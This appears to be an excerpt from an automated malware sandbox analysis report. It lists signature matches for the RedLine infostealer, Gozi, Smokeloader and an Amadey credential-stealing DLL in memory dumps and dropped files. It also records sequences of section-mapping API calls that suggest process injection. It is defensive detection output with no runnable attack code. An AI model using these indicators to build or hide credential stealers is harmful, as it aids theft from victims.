                      Source: 32.2.F771.exe.267a196.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 32.2.F771.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                      Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                      Source: 00000018.00000002.792008341.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000C.00000002.424634553.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000027.00000000.474180010.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                      Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                      Source: 00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000000.00000002.340457364.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000002B.00000000.482523463.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                      Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                      Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                      Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                      Source: 00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                      Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                      Source: 0000000C.00000002.428145666.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000D.00000003.501276183.00000000024E6000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                      Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                      Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                      Source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                      Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                      Source: 00000023.00000000.462429473.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000001A.00000002.597295606.0000000000934000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.340166873.0000000000871000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000B.00000002.393611577.00000000008D1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 00000018.00000002.797855651.00000000008D1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000029.00000000.476884087.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000000E.00000002.778202209.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                      Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                      Source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000000E.00000002.787937568.0000000000A41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                      Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                      Source: 00000026.00000000.469133580.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000020.00000002.806650961.0000000000951000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000021.00000000.456333193.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000000B.00000002.393447143.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000001A.00000002.593292685.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                      Source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                      Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: String function: 00418C10 appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: String function: 00416F20 appears 130 times
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeCode function: 0_2_00401386 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeCode function: 0_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeCode function: 0_2_00401469 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeCode function: 0_2_0040148C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_00401386 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
